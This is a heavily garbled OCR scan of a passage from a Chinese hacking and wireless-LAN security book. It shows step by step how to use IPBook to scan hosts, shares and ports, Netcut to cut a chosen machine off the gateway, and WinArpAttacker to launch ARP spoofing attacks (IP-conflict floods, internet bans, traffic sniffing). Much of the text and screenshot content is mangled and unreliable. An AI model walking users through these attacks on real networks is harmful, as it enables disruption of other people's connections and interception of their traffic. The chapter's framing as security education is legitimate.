1 吧 1630108 。 网 络 科技 DRKGROUP 40A5EF DE A9 国 娄 司 打 Fl 机 
| 112 AFOIGEI2NEd ‘WORKGROUP camo rc cr. 
转 1321630114 af0lG-TIOTID1T WORKGROUP CCB 缀 人 D 扣 . 
| 
1921530.108 
4 》 < 》 


RESPONSE Lersth=175 recy hem 192.1680U104 
DESKTOPSINOBIF <00>¢cUNIDUE;4 
REGROUP “00xGROUP>84 
DESKTOF PONGBIF *20><UNIDUE;4 
RKG “1E*<GPRDUP84 


遍 殷 共 邓 资源 任务 按 束 。 


在 计算 机 区 列表 中 选择 某 台 计算 机 ， 
单 击 Nbtstat 按 钮 ， 即 可 在 “IPBook (超级 
网 络 邻 居 ) ” 主 窗口 看 到 该 主机 的 计算 机 
名 称 ， 如 下 图 所 示 。 


后 IPBook 正式 注册 板 (总 滨 网 阁 轨 居 ) - 口 x 
文中 W) 工具 和 凤 四 
扫描 。 | 妆 把 陈 | 妈 源 包 理 器 | 


| Tf 范围 e2163.0 ”全 拉 英 一 个 网 段 | 句点 院 失 享 资源 7| 例 大 地 融 由 捕 | 台 短 代 科 雪 | 
IF 地 址 本 192. 16%. 0. 108 "| pirg Tbtatat | as 共享 加 次 后 信 | 其 他 工 县 = 
| 训 口 、|80; 开 ;135” 回 揉 则 燥 | 加 大 范 攻 BIDD 扫 描 | 


俊 1pBcck 正式 注 荣 版 ( 下 级 网 沿 邻 司 ] —- 口 Xx 
文 (WwW 工具 Wj 部 即 [加 
EE 

”IF 范围 「192. 188.0  ” 乙 扫 描 一 个 网 器 | 总 点 验 共 享 咨 源 | 加 大 范 下 抄 捕 


IP 地 址 【192. 168.0.104 ~| Pirs|mbtstsat| a 共 训 | 加 发 扰 信 | 其 地 工具 
洪 口 ”|80.21;135 ”加 控 洲 澡 口 | 中 大 藻 围 淋 口 扫描 | 


阅 拔 信和 群 宪 


巴 9 ]66.0. 108 


-- 国 公司 员工 任用 汇总 


192.168.0 104 DESKTOPE7NQBIF WORKEROUP 
132.166.0 104 DESKTOFB7NOBIF WORRGROUP 


加 192168.0108 


1921880106 DESKTOPSCYENG| -WORKGROUP 2 
转 192168010? DESKTOPDEKFISE WORKGROUP 中 TA 任用 汇 电 
恩 192.168.0108 网 络 科技 WODRKGROUP 自 i 
国 1321680112 AFOIG-611211054 woORKGRAOUP 白 怠 19 ee 0.108 
192.168.0 114 AFOIG-?02111221 WORKEROUP 和 启 处 避 员 工 任 大 汇总 
192.168.0108 -- 国 公司 打 Et\ 
1921680108 


日 鸳 1 156.0. 104 


字体 陈 


和 机 各: DESFTIP EAIF Dh HOST 


sy 


192.168.0.104\ 宇 体 原 已 暨 打开 。 


单 击 “探测 端口 ”按钮 ， 即 可 探测 整 
个 无 线 局 域 网 中 各 个 主机 的 端口 ， 同 时 将 
探测 的 结果 显示 在 下 面 的 列表 中 ， 如 下 图 
所 示 。 


后 IPBook 正式 注册 板 (超级 网 洛 邻 忆 ) - 0O x 
文件 W) 工兵 W) 孝 动 轧 
扫 泣 。 | 数据 话 | 褒 芹 管理 只 | 


| JP 范围 [192. 168.0 扫描 一 个 网 自 验 共 京 资 源 | 崔 太 敬 甜 和 | 加 短信 群发 
IF 地 址 | Ping | Nbtstat | 。 共享 | 加 发 运 信 | ”其 他 TI 县 ~ 


| 
| 端口 8:31:135” 回 探 出 咒 口 | 四 大 范围 8D 扫 描 | 


计算 机 区 


计算 机 区 -共享 这 下 区 一 一 一 一 一 
[Petl - ~ | [日 本 192. 160.0.104 (085ETO 
1921630108 CESKTOP.ECYBNG! swDRKGROUP 00.232409.881 - 世 字体 库 
| 人 107 DESKTOPDSKFISE ‘WOAKGROUP 50F04Fe 5 | | 电量 392.188.0.108 
1 吧 1630.108 ”网络 科技 WORKGROUP 40A5EF DEA) -全 公司 员工 任务 拒 乌 
1921630112 。 AF0IG.6I1211064 YORKGROUP C86000.9C CC 国 共 司 打 Fh 机 
1S21630114 =sFDIG-TTTZ1 WOARKGRAOUP Ce 恨 部 站 
园 1 吧 1630.108 
| ht 108 
1S21580.108 
是 1 108 网 络 科技 DRKGROUP 40A5EFDEA9 
1 吕 1630108 ”网 蚁 科 拷 WORKERNUP 40A5EFDEA9 ™ 
[4 》 < 》 


REGROUP <00><GROUP>04 
- <20%><UNIDUE>4 
REGRPOUP Et 
WAC pihase=t0 5 EF.DE. AI 
Group-WDRKGRDUP 和 技 ”Staalamap 欣 利 技 。 .Meesangei~ 


NBSTAT Response From 192.168.0.108 得 到 不计 看 机 个、 工作 浊 、MAC 失 址 和 


单 击 “ 共 享 ” 按钮 ， 即 可 对 指定 的 网 
络 段 的 主机 进行 扫描 ， 并 把 扫描 到 的 共享 
资源 显示 出 来 ， 如 下 图 所 示 。 


区 |pBook 正式 注射 版 (起 深 网 洛 急 居 ) 一 口 x 
文 姓 (W) 工具 [Y) 三 助 避 ) 
要 措 。 | 就 捉 夺 | 设 蚤 包 硬 落 | 


Tr 范围 |192. 168. 0 妨 扫描 一 个 网 段 | 局 点 验 共 享 资源 | 八大 泣 天 炎 捕 | 到 短信 群发 

IF 地 址 1192. 168, 0, 104 ”| Firg |Hbtstat | a> 共享 | 葬 宪 拔 信 | 其 他 工具 = 
| 就 口 ”|80;21, 135 ”加 探 由 关口 | 加 大 范围 闭口 扫 摘 | 
填 履 机 区 共 空 实感 区 
PW | 计 Wn 名 | 全 使 ||| ;“- 回 字体 床 机 
转 1321530104 。 DESKTOF.67NOBIF WORKGROUP 9 时 ihe a 

1%21630104 DESKTOP-ETNOBIF WODRKGROUP 六 辐 公司 页 工作 考 汇 品 

1921530106 DESKTOP.SCVBNGI ”WORKGROUP 上 一 加 共 可 打印 机 

1 和 21680107 DESKTOP.DEKFISE 。 DRKGROUP 外 1 hee 

1 吧 1530.108 。 同 阁 科技 WORKGROUP ;站 公司 打印 要 
| ph af0IG.6I1211064 ‘woORKGROUP a 

15216a0114 上 FDIGT702l11221 ‘woORkKGAOUP 人 人 总 
国 1921630.108 : ”| i 
型 1 和 16301m 驳 19e.193.0.104 
局 |1521530.108 i 口 医 下 

> v 

Group=wWDRK rp 耻 和 ShareNzmen5 拘 刊 技 。 Mestengele 办 
192.1E801O3ED21IFT 
132. Ta 


132.158.0 104 拆 )21IFTPE 册 口 趟 开 训 
] 开 共 字 次 件 灾 W192 1E8.0104' 字 体 原 


\W192.168.0.104\ 字 体 原 已 经 打开 。 


IPBook 工 具 还 具有 将 域名 转换 为 IP 
地 址 的 功能 ， 在 “IPBook (超级 网 络 领 
居 ) ” 主 窗 口中 单 击 “其 他 工具 ”按钮 ， 
在 弹出 的 快捷 菜单 中 选择 “域名 、IP 地 址 转 
换 ” 一 “IP 一 Name” 菜 单项 ， 即 可 将 IP 地 
址 转换 为 域名 ， 如 下 图 所 示 。 


282 


国 1% 630104 OESKTOPENNOEF woOAKGAOUP = 入 192 1 的 .0 .106 

加 132.1630104 0DESKTOPS7NQBIF WOAKGROUP -全 公司 员工 任务 汇总 
150.1630106 OESKTORECVBNG| 。 wDRKGROUP 全 公司 打印 机 
i110 DESKTOPDSKFISE WOAKGADUP 品 外 a Im 

异 1 忆 1680108 ”网络 科技 woRRGROUP 站 忆 JR 汇 扣 

矶 1321630112 AFOIG-511211054 WoAKGROUP 昌吉 192. 105.0.100 

辑 1321630114 aFOIG-M2111221 woAKGROUP 二 四 公司 员工 任务 汇总 

时 1%2.1630108 -站 公司 打 E6 机 

于 1 习 1620108 192. 155.0. 104 
150.163.0.108 3 字 读 原 

网 络 科技 wDRKGRDUP v | -ttpi//9.155.0.M » 

> < > 


HE 入 节 


132158.0.1 
1921E8.0.1 


135 兴 口 开 癌 
2 PT 


192 1E8.0. 上 TP 饮品 开放 


以 192.1658.0.104\ 字 钵 诛 已 经 打开 。 


单 击 “大 范围 端口 扫描 ”按钮 ， 
即 可 打开 “扫描 端口 ”对 话 框 ， 如 下 
图 所 示 。 选 择 “IP 地 址 起 止 范围 ” 单 选 
框 后 ， 将 要 扫描 的 IP 地 址 范围 设置 为 
192.168.000.001~192.168.000.254， 最 后 将 
要 扫描 的 端口 设置 为 80:21。 


扫描 党 口 ~ 


做 附近 的 几 个 C 网 段 
全 乔 基 扯 起 止 范 图 


[Ee 


只 近 站 习 
不: e168 00001 
到 : | 168000254 


扫 莉 计算 机 (192.168.0.*》 附 近 具 
132165801 到 13z1580254 共 1 个 网 禹 254 
合 电脑 的 应 口 


[上 先 Fing 后 庄 


端口 ”15021 


mm 消 | Hep | 


单 击 “ 开 始 ” 按 钮 ， 即 可 对 设 定 IP 地 
po orl pr 
的 主机 显示 在 下 面 的 列表 中 ， 如 下 图 所 示 。 
| 后 1pBook 正式 注册 村 (起 加 网 阁 令 居 ) 


文件 W] 工 RY) 帮助 站 
扫 棋 ”| 数据 床 | 识 源 管理 器 | 


IP 苑 围 |192. 168.0 太夫 内 关 、 | 恰 六 坷 甜 昌 本 | 加 短信 和 群居 
92. 168%. 0. 10 

3 

时 

IF Ew 104 

到 1: Q 四 字 洒 库 

恩 132.1630106 = Me 192. 163.0. 108 
1301B30107 OESKTOFPOMRFISE WOAKGROUP 3 日 公司 员工 任务 二 
1S2.1680108 pn ee 
1 1112 D. 10 

tt et 证 ty 192. L869. 0. 107 

一 t 【6 0.1[8 

届 132.1630105 1 
122.162D102 扰 淡 口 
1®%.16BB0101 

加 132.163.01 

< 


192158.0.10899S0 汕 口 趟 开 访 

下放 区 ,bind eol=CL.UDPcouni=9 
让 a a 

搂 吉 i 和 下 


2168 01[3' 字 体 库 


荔 口 扫 徇 任务 秃 束 。 


在 使 用 IPBook 工 具 过 程 中 ， 还 可 以 
对 该 软件 的 属性 进行 设置 。 在 “IPBook 


(超级 网 络 邻 居 ) ” 主 窗 口中 选择 “ 工 
具 ” 一 “选项 ”菜单 项 ， 即 可 打开 “ 设 
置 ” 对 话 框 ， 如 下 图 所 示 。 在 “扫描 设 
置 ” 选 项 卡 下 ， 即 可 进行 “Ping 设 置 ”和 
“设置 解析 计算 机 名 的 方式 ”属性 。 


刘 x 
E 共享 设置 | 
Pingi 设 置 
TimeDut: hoo 


厂 采用 上 先 Ping 后 : 


人 厂 扫描 时 顺带 搜索 共享 资 源 


个 正常 


‘enbtstat 


| 确定 | 取消 | 才 助 | 


选择 “共享 设置 ”选项 卡 ， 在 其 中 可 

设置 最 大 线程 数 、 搜 索 共享 时 的 顺带 搜索 

项 目 等 属性 ， 如 下 图 所 示 。 
TE 


Sessoooco00rnnonorocrco0cont 


最 大 线程 数 |254 

下 列 是 搜索 共享 时 的 顺带 搜索 项 目 一 本 
厂 搜索 HTTP 服 务 
搜索 FTP 服 务 


三 搜索 隐藏 共享 


第 14 章 ”无线 局 域 网 的 安全 防护 一 全 


如 果 成 功 注 册 后 ， 就 可 以 使 用 大 范围 
搜索 功能 来 搜索 任意 范围 的 计算 机 名 、 工 
作 组 、MAC 地 址 及 共享 资源 等 。 


14.3 无线 局 域 网 的 攻击 


江 全 
黑客 可 以 利用 专门 的 工具 来 攻击 整个 


无 线 局 域 网 ， 例 如 使 无 线 局 域 网 中 两 台 计 
算 机 的 人 P 地 址 发 生 冲 突 ， 从 而 导致 其 中 的 一 
台 计 算 机 无 法 上 网 。 本 节 将 介绍 几 球 常见 


的 局 域 网 攻击 工具 的 使 用 方法 。 
14.3.1 网 络 剪 刀 手 Netcut 


网 络 剪 切 手 Netcut 是 一 款 网 管 必 备 工 
具 ， 可 以 使 无 线 局 域 网 中 任何 主机 断 开 网 络 
连接 。 利 用 ARP 协 议 ， 同 时 也 可 以 看 到 无 线 
局 域 网 内 所 有 主机 的 卫 地 址 。 还 可 以 控制 本 
网 段 内 任意 主机 对 外 网 的 访问 ， 随 意 开 局 或 
关闭 其 Internet 访 问 权 限 ， 而 访问 内 部 LAN 
其 他 机 器 不 存在 任何 问题 。 

该 工具 的 具体 使 用 步骤 如 下 : 
下 载 并 安装 网 络 剪刀 手 Netcut， 然 后 
双击 其 快捷 图 标 ， 即 可 打开 Netcut 主 窗口 。 
软件 会 自动 搜索 当前 网 段 内 的 所 有 主机 的 
IP 地 址 、 计 算 机 名 以 及 各 自 对 应 的 MAC 地 
址 ， 如 下 图 所 示 。 


TT 
= 
四 
一 
电导 
国 了 
Ea 
斩 7 
一 
~ 
= 


单 击 “ 选 择 网 卡 ” 按 钮 ， 打 开 “ 选 
择 网 卡 ” 对 话 框 ， 在 其 中 可 以 选择 搜索 计 
算 机 及 发 送 数据 包 所 使 用 的 网 卡 ， 如 下 图 
所 示 。 
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黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


网 卡 信息 

网 卡 :Attansic L2 Fast Ethemet Controller [Microsoft's Packet 
scheduler] 

物理 地 址 : [00:1E:8C:17:B0:85] 

上 P 地 址 ; [1921658:0: 引 

网 关 : [192.168.0.] 


[step 图 在 网 络 剪刀 手中 还 可 以 开局 或 关闭 无 
线 局 域 网 内 任意 主机 对 网 关 的 访问 。 在 打 
描 出 的 主机 列表 中 选中 IP 地 址 为 192.168.0.8 
的 主机 后 ， 单 击 “ 切 断 ” 按 钮 ， 即 可 看 到 
该 主机 的 “ 开 / 关 ”状态 已 经 变 为 “ 关 ?”， 

此 时 该 主机 不 能 访问 网 关 ， 也 不 能 打开 网 
页 ， 如 下 图 所 示 。 


mosof735e 中 .， [O01E:SC:17,60:65] 


避 司 可 了 引 司 引 下 本 可， 
科 沁 于 下 :下 :站 :下 


再 次 选中 IP 地 址 为 192.168.0.8 的 主机 
后 ， 单 击 “ 恢 复 ” 按 钮 ， 即 可 看 到 该 主机 
的 “ 开 / 关 ”状态 又 重新 变 为 “ 开 ”， 此 时 
该 主机 可 以 访问 Intemet 网 络 ， 如 下 图 所 示 。 


这 化 陋 攻 放风 无 琵 


- 下 
mrorof-7aE8dh.... [Do1E:SC'17'E0'B5] 


间 生 阳 间 有 间 间 间 间 间 间 册 归 关山 尖 
卫 : 耻 ， 村 由 求 弄 沁 下 国 沁 
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如 果 无 线 局 域 网 中 主机 太 多 ， 可 以 使 
用 该 工具 提供 的 查找 功能 ， 快 速 查看 某 个 主 
机 的 信息 。 在 Netcut 主 窗口 中 单 击 “查找 ” 按 
钮 ， 即 可 打开 “查找 ”对 话 框 ， 如 下 图 所 示 。 


在 其 中 的 文本 框 中 输入 要 查找 主机 的 
某 个 信息 ， 这 里 输入 的 是 PP 地址， 然后 单 击 
“查找 ”按钮 ， 即 可 在 Netcut 主 窗口 中 快速 
找到 JP 地 址 为 192.168.0.8 的 主机 信息 ， 如 下 
图 所 示 。 


J 7 -| - DB:6 . 
[00:1E:8C:17:E0:65] 
| F " 


Fe] | 


TITTETTITETTT 本 
= 4 沿革 4 ， 


利用 网 络 剪刀 手 的 打印 表 功 能 即 可 查 
看 无 线 局 域 网 中 所 有 主机 的 信息 。 在 Netcut 
主 窗 口中 单 击 “ 打 印 表 ”按钮 ， 即 可 打开 
“地 址 表 ” 对 话 框 ， 在 其 中 即 可 看 到 所 在 
无 线 局 域 网 中 所 有 主机 的 MAC 地 址 、IP 地 
址 、 用 户 名 等 信息 ， 如 下 图 所 示 。 


在 网 络 剪刀 手工 具 中 还 可 以 将 某 个 主 
机 的 JP 地 址 设置 成 网 关 IP 地 址 。 在 Netcut 主 
窗口 中 选择 某 台 主机 后 ， 单 击 功 中 按 包 ， 

将 该 IP 地 址 添加 到 “网 关 IP” 列 表 中 ， 如 下 


| 司 | [RP | 
73:44:E0:CE59] 上 ET 

cromof-?7atercb,,,, [C0;1E;C:17?;B0;E5] 1 155 
La py i li | . 


一 
一 
一 
加 
一 
虽 
一 
局 
Ea 


14.3.2 WinArpAttacker 


WinArpAttacker 是 一 款 功 能 强大 的 无 线 
局 域 网 软件 ， 利 用 该 工具 可 以 实现 对 ARP 机 
器 列表 扫描; 对 ARP 攻 击 、 主 机 状态 、 本 地 
ARP 表 发 生变 化 等 进行 检测 ; 检测 其 他 机 
器 的 ARP 监 听 攻 击 ， 并 目 动 恢复 正确 的 ARP 
制 ARP 包 等 。 但 是 该 工具 是 基于 Winpcap 软 
件 , 所 以 在 运行 前 必须 先 安装 Winpcap 软 件 。 

使 用 WinArpAttacker 工 具 的 具体 操作 步 
又 如 下 : 

下 载 WinArpAttacker 软 件 ， 双 击 其 中 
的 “WinArpAttacker.exe ”程序 ， 即 可 打开 
“WinArpAttacker” 主 窗口 ， 如 下 图 所 示 。 


| WW Untitled - WinArpAttacker 3.70 一 口 X 


文件 ” 失 瘤 攻 去 检测 设 县 罕 口 邦 苔 
儿 希 向 电疗 错 
传 止 EJ 至亲 关 


由 民 轩 器- 灌 - 
| Online | Sniffng | Atack ArpSQ | ArpSP | Ar 


IP Address | Mac Address Hostname 
口 192.168.0.104 D0-1E-3C-AD-13-..。 DESKTOP-67NQ.，Online Normal Normal 0 0 


Time Event ActHost EffectHost IP Mac 

2017-08-14 17:50:44 New Host 192.1658.0.1 F4-83-CD-33 169.254.255.255 00-00-00-00- 
192.168.0.1 Fd-83-CD-33- 
192.168.0.2 00-00-00-00-! 
192.1658.0.3 00-00-00-00-(Y 
< > 

[08/14/17 17.5021] -一 WinArpAtpcker370 Buid 2006.09.04-—— 

[O814/17 17:5021) Ths program is ireecware, so you con use ond redisirnbute + irccjy 

Ready IP; 192.168.0.104 |Mac: 00-1E-8C-AD-13-'IGW:;: 19e 
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ep 了 选择 “扫描 ”一 “高 级 ”菜单 项 ， 
即 可 打开 “扫描 ”对 话 框 ， 从 中 可 以 看 出 
有 “扫描 主机 ”“ 扫 描 网 段 ” “多 网 段 扫 
描 ” 等 3 种 扫描 方式 ， 如 下 图 所 示 。 


雪 摘 Xx 


高 汲 扫 描 

售 扫描 主机 | 192 .1686 . 0 .104 

个 扫 摘 网 段 192 .166 .0 .1 192 .168 . 0 .254 
个 多 网 段 扫 描 


255. 255. 255. 0 


口 0 192.168.0. 104 


lv 正常 扫描 三 尽 点 听 扫 措 


扫 指 


取 消 | 


step 图 使 用 “扫描 主机 ”方式 可 以 获得 目 
标 主 机 的 MAC 地 址 。 在 “扫描 ”对 话 框 
中 选择 “扫描 主机 ” 单 选 按钮 ， 并 在 后 面 
的 文本 框 中 输入 目标 主机 的 IP 地 址 ， 例 如 
192.168.0.104， 然 后 单 击 “扫描 ”按钮 ， 即 
可 获得 该 主机 的 MAC 地 址 ， 如 下 图 所 示 。 
BE 
高 级 扫描 
‘扫描 主机 
个 扫描 隐 段 
个 将 网 段 扫 描 


| 192 .168 .0 .104 po-1E-6C-AD-13-5F 


192 .168 .0 .1 192 .168 .0 .254 


[0 192.168.0. 104 


255. 255. 255.0 


lv 正常 扫描 三 尽 点 听 扫 损 


扫 描 | 取消 | 


“扫描 网 段 ” 方 式 可 以 对 指定 IP 段 范 
围 内 的 主机 进行 扫描 。 选 择 “ 扫 描 网 段 ” 
单 选 按钮 后 ， 在 IP 地 址 范围 的 文本 框 中 输入 
扫描 的 卫 地 址 范围 ， 如 下 图 所 示 。 
= RE 
高 级 扫描 
个 扫描 主机 
全 扫 摘 网 段 
个 多 网 段 扫 描 


0: E06 RD 15 


192 .168 . 0 .254 


2 8009 00 
192 .168 .0 .1 


Subnet | IF 
Oo 192.168.0. 104 


255. 255. 255. 0 


lv 正常 扫描 三 民 点 听 扫 措 


扫 描 


取 消 | 
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单 击 “扫描 ”按钮 即 可 进行 扫描 
操作 ， 当 扫描 完成 时 会 出 现 一 个 Scaning 
successfully! 对 话 框 ， 如 下 图 所 示 。 


WinArpAttacker xX 


六 Scanning successfully ! 


依次 单 击 “确定 ”按钮 ， 返 回 到 
WinArpAttacker 主 窗口 中 ， 在 其 中 即 可 看 到 
打 描 结果 。 此 时 WinArpAttacker 窗 口 被 分 成 
三 个 部 分 ， 如 下 图 所 示 。 


BW Untitled - WinArpAttacker 3,70 一 口 xX 
文件 扎 撕 攻击 检测 设 豆 玖 口 完 助 ER 
Ur 滨 
品 忆 遇 葡 -条 - 汐 尖 狗 竟 辣 嫩 守 和 旬 
开 拓 天 i 于 止 尖 设 下 更 新 
IP Address | Mac Address | Hostname Online | Sniffing | Attack | ArpsQ| ArPSP | ArpR. | ArpRP | 
口 192.168.0,1 F4-83-CD-33-60-,,. 192.168.0.1 Online Normal Normal 7 0 0 1 
口 19z168.0.100 A4-5E-60-16-7A-... 192.168.0.100 Online Normal Normal 0 0 1 0 
口 192.168.0.104 00-1E-8C-AD-13-,, DESKTOP-67NQ,,, Online Normal Normal 258 11 13 7 
口 192168.0.105 00-23-24-D9-B6-... P- i | Normal Normal 1 0 1 
口 132.168.0.107 S58-F8-84-FB-58-.. DESKTOP-D5KF.. Online Norrmal Normal 1 0 0 1 
口 192168.0.108 #0-A5-EF-DE-A9-... 192.168.0.108 Online Normal Normal 了 0 0 3 
口 132.168.0.112 C3-60-00-9C-CC-.. AFOIG-6112110.. Online Normal Normal 1 0 0 1 
Time Event ActHost EffectHost A | Il Mac 
2017-08-14 17:53:09 ”New Host 192,168.0,108 40-AS5-EF-DE-A9-,,, 192,168.0.1 F4-83-CD-33-60-,,, 
2017-05-14 17:53:10 Arp_Sctan 192.163.0.104 192.168.0.2 00-00-00-00-00 
2017-08-14 17:53:08 New Host 192.163.0.112 C8-60-00-9C-CC-,.. 192.168.0.3 00-00-00-00-00- 
2017-05-14 17:53:08 New Host 192.168.0.106 00-23-24-D9-66-... 192.168.0.4 00-00-00-00-00-... 
Y 11o24Fans MM Mm. 3 


< 
arAI7 17:50:21] —— 3.70 Bu 2006.09.04—— 
[08714#/17 17:50:271] Thls propram 8 traewars, so you can uss end roedistrbuts + 1raely. 


Ready |ip: 192.168.0.104 |Mac: 00-1E-8C-AD-13-'IGW: 192.168.01 IGW 


e 上 面 的 区 域 是 主机 列表 区 ， 主 要 显 
示 无 线 局 域 网 内 的 机 器 IP、MAC、 
主机 名 、 是 否 在 线 、 是 否 在 监听 、 
是 否 处 于 被 攻击 状态 ， 以 及 ARP 数 
据 包 和 转发 数据 包 统 计 信 息 等 ; 

e 左下 方 的 第 二 个 区 域 是 检测 事件 显 
示 区 ， 主 要 显示 检测 到 的 主机 状态 
变化 和 攻击 事件 ; 

e 右 下 方 的 区 域 显示 IP 地 址 和 MAC 地 
址 信息 。 

在 扫描 结果 中 选中 要 攻击 的 目标 计算 
机 前 面 的 复 选 框 ， 然 后 在 WinArmpAttacker 主 窗 
口中 单 击 “攻击 ”下 拉 按 钮 ， 在 弹出 的 快 
捷 菜 单 中 选择 任意 选项 就 可 以 对 其 他 计算 
机 进行 攻击 了 ， 如 下 图 所 示 。 
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一 Untitled - WinAxrpAttacker 3.70 一 口 Xx 
立 忻 扫 撕 攻击 究 则 识 至 赣 口 大助 


品 居 里 或 - 融 纹 束 禾 区 局 嫩 赛 和 锡 


IPAddress IC 可 sniffing | Arack | ArpsQ | Arpsp | ArpR... | ampP| 
口 192.168.0.1 F4-83-CD-33-6 ”其 止 上 网 bline Normal Normal 46 0 0 5 
口 192.168.0.100 A4-5E-60-16-7 phpes Nine Nermal Normal 0 0 6 0 
口 192163.0.104 00-1E-8C-AD-1 hline Normal Normal 258 15 17 7 

口 192168.0.106 00-23-24-D9-8 监听 网 基肥 六 hline Normal Normal 1 0 3 1 
口 192.168.0.107 。 56-FB-84-F8-5 ”监听 主机 通 汉 hiine Nermal Normal 1 0 0 1 
回 192.163.0.108 。 40-A5-EF-DE-A gp bine Normal Normal 3 0 2 3 
口 192.168.0,112 C8-60-00-9C-C -hline Normal Normal 1 0 1 1 
Time | Evert ActHost | EffectHost ^ lp Mac 

2017-08-14 17:53:09 ”New Host 192.168.0.108 40-A5-EF-DE-A9-. 192.168.0.1 F4-83-CD-33-60-.. 
2017-08-14 17:53:10 Arp_ Scan 192.168.0.104 192.168.0.2 -00- 
2017-08-14 17:53:08 New Host 192168.0.112 C8-60-00-9C-CC-.. 192.168.0.3 00-00-00-00-00- 
2017-08-14 17:53:08 。 New Host 192.168.0.106 00-23-24-D9-86-. 00-00-00-00-00- 


192,168,0,4 
Y jioazlrans ”rnnnnnnn-nm- 


LUBRTAT7 T7502 —— WNTATATS CES 3 MU BU ZUUG 只 一 一 
[DEr1#/17 17:50:21] Thts program ® treeware 30 you Can use and redistrbute E freely 


|IP: 192.168.0.104 ”|Mac: 00-1E-8C-AD-13-'|GW: 192.168.0.1 GW 


在 WinArpAttacker 中 有 以 下 6 种 攻击 
方式 : 
e 不 断 IP 冲 突 : 不 间断 的 IP 冲 突 攻 
击 ，FLOOD 攻 击 默认 是 一 干 次 ， 可 
以 在 选项 中 改变 这 个 数值 。FLOOD 
攻击 可 使 对 方 机 器 弹出 IP 冲 突 对 话 
框 ， 导 致死 机 ; 
e 禁止 上 网 : 禁止 上 网 ， 可 使 对 方 机 
右 不 能 上 网 ; 
定时 卫 神 突 : 定时 的 人 P 冲 突 ; 
监听 网 关 通 信 : 监听 选 定 机 器 与 网 
关 的 通信 ， 监 听 对 方 机 器 的 上 网 流 
量 。 发 动 攻 击 后 用 抓 包 软 件 来 抓 包 
看 内 容 ; 
e 监听 主机 通信 : 监听 选 定 的 几 台 机 
器 之 间 的 通信 ; 
e 监听 网 络 通信 : 监听 整个 网 络 任意 
机 器 之 间 的 通信 ， 这 个 功能 过 于 危 
险 ， 可 能 会 把 整个 网 络 搞 乱 ， 建 议 
不 要 乱用 。 
如 果 选 择 “IP 冲 突 ” 选 项 ， 即 可 使 目 
标 计 算 机 不 断 弹出 “IP 地 址 与 网 络 上 的 其 他 
系统 有 冲突 ”提示 框 ， 如 下 图 所 示 。 


全 Yindors 一 系统 针 误 x 


IF 地 址 与 网 络 上 的 其 地 系统 有 圳 突 。 


如 果 和 选择“ 禁止 上 网 ”选项 ， 此 时 在 
WinArpAttacker 主 窗口 就 可 以 看 到 该 主机 的 
“攻击 ”属性 就 变 为 BanGateway， 如 果 想 


停止 攻击 ， 则 需 在 WinArpAttacker 主 窗口 选 
择 “ 攻 击 ” 一 “停止 攻击 ”菜单 项 进行 停 
否则 将 会 一 直 进 行 ， 如 下 图 所 示 。 


BB Untitled - WinArpAttacker 3,70 一 口 Xx 
文件 扫 招 攻 主 被 出 设 半 前 口 我 一 


口 132.168.01 F4-83-CD-33-60-,.. 192,168,0,1 Online Normal 

口 192168.0.100 A4-5E-60-16-7A-.. 192.168.0.100 Online Normal Noond 6 0 8 0 
口 132168.0.104 00-1E-8C-AD-13-.. DESXTOP-67NQ... Online Normal Normal 264 23 24 10 
口 192168.0.106 00-23-24-D9-B6-. DESKTOP-SCVB... Online Normal Normal 了 0 了 1 


DESKTOP-D5KF. Online 


口 192168.0.107 。” 59-FB-a4-FB-S8-.… 
同 1 EF-D 


-DE-# Online Norma 
口 192168.0.112 ca rr 9C-CC-... AFOIG- 61 12110.. Online a 


< > 


Time Event Actiiost EffectHost ~ 

2017-08-14 17:55:;34 Attack IP Conilict 192,168,0,108 40-A5-EF-DE-AYQ-,,, 192.168.0.1 F4-83-CD-33-60- 

2017-08-14 17:55:15 Local Arp Entry Change 192.163.0.108 #0-AS5-EF-DE-Ag-... 192.168.0.2 00-00-00-00-00 

2017-08-14 17:56:06 Attack Spoof Ban Access 0.000 192.1680.1 192,168.0.3 00-00-00-00-00 

2017-08-14 17:56:06 ”Attack Spocf Ban Access 0.000 192.168.0.108 192.168.0.4 00-00-00-00-00 
A520N Mm mmmm. ™ 

< 

10B1417 17:55:33) Flodng mission finished. ~ 

[O814/17 17 56:06] SanGateway Mesion sterted successfuly 

Ready |IP: 192.168.0.104 ”Mac 00-1E-8C-AD-13-''GW: 192.168.0.1 GW 


在 WinArpAttacker 主 窗口 中 单 击 “发 
送 ” 按 钮 ， 即 可 打开 “手动 发 送 ARP 包 ” 
对 话 框 ， 在 其 中 设置 目标 硬件 Mac、Arp 方 
向 、 源 硬件 Mac、 目 标 协 议 Mac、 源 协议 
Mac、 目 标 IP 和 源 IP 等 属性 后 ， 单 击 “ 发 
送 ” 按 钮 ， 即 可 向 指定 的 主机 发 送 ARP 数 
据 包 ， 如 下 图 所 示 。 

手动 发 尖 ARP 包 

配置 IP 冲 突 包 


Dst Hardware 大 ac 
Sro Hardware 大 ac 


三 
[00-00-00-00-00-( 厂 
00-00-00-00-00-( 三 
00-00-00-00-00-( 厂 


Mrp op [Reansst | 厂 
nstIr|o .0°0-.0.0 Td 


Sre IP 0 .0 0 .0 户 


Dst Protocol 大 ac 


Sro Protoool Wac 


00000000 00 00 00 00 00 00 00 00 00 00 00 00 08 06 00 01 
00000010 08 00 06 04 00 01 00 00 00 00 00 00 00 00 00 00 
00000020 00 00 00 00 00 00 00 00 00 00 


对 ARP 包 的 结构 比较 熟悉 才 行 。 如 果 你 知道 ARP 攻 击 原理 ， 你 可 以 
闪 坟 各 让 同 作 仿生 则 本科 


Frequency confligure Delay between packets 


Delay p ns 
矿 Disable Detect feature. 


[发 送 | 取消 | 


在 WinArpAttacker 主 窗口 中 选择 

“设置 ”菜单 项 ， 然 后 在 弹出 的 快捷 菜 
单 中 选择 任意 一 项 即 可 打开 Options 对 话 
框 ， 在 其 中 对 各 个 选项 卡 进行 设置 ， 如 下 
图 所 示 。 


人 [Continuously 


站 i ES 
fe Wumber of time |1 Ea 


第 14 章 ”无线 局 域 网 的 安全 防护 SI 


Options X 
适配器 | 攻 主 | 更 新 | 检测 | 分 析 |ARP 代 理 | 保护 | 


Atheros L1 G 


igabit Ethernet 10/100/1B 


拱 述 [Atheros L1 Gigabit Ethernet 10/100/100( 


本 机 IP e21680104 + 
子 网 掩 码 |255255250 +| 
本 机 MAC [oiEBCAD3SF 
网 关 IP leaneso1 | 
网 关 MAC [F483-cD-33.6073 | 


DNS G6 .128.114.134 
G6 .128.114.167 
列表 |\Device\NPF {82CAC205-4844-4802-8E93-EC6F26B0D70F} 


